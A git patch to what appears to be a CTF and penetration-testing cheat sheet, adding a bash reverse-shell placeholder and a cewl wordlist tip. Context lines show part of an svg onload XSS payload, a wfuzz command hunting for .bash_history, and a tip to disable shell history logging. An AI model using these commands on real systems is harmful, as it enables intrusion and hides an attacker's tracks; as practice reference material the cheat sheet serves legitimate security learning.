From 1ac8b275d84186fb6ef48c4025194f8310e5891d Mon Sep 17 00:00:00 2001
From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Sun, 29 Nov 2020 13:42:53 -0500
Subject: [PATCH] Update Cheat Sheet.md

---
 Cheat Sheet.md | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/Cheat Sheet.md b/Cheat Sheet.md
index 77f40b6..5e7a4c0 100644
--- a/Cheat Sheet.md	
+++ b/Cheat Sheet.md	
@@ -196,6 +196,9 @@ Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script"
 `wfuzz -u http://<ip>:<port>/<api-endpoint>\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404` <br/>
 Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_history` "?" is before the parameter and FUZZ is telling to find a parameter and we are looking for `.bash_hitory` as an example
 
+### Web Shell Bash
+`bash -c "<bash_rev_shell>"`
+
 # Wordlists
 
 ### Directory Bruteforcing
@@ -210,6 +213,12 @@ Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_his
 * using `crackstation`
 * using `seclists`
 
+# Generating Worlists for directory brute force
+
+### Cewl 
+This spiders the given url and finding keyowrds then makes a wordlists through it's findings<br/>
+`cewl.rb <ip>`
+
 # King Of The Hill (KoTH)
 ### Monitoring and Closing Shell (Linux)
 * strace `debugging / tamper with processes`
@@ -240,8 +249,6 @@ Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_his
 
 
 
-
-
 export HISTFILE=/dev/null found this it might help you out a little when doing KOTH it basically stops bash logging your commands in the ~/.bash_history file <br/>
 sudo ifconfig tun0 down<br/>
 sudo ip link set tun0 down<br/>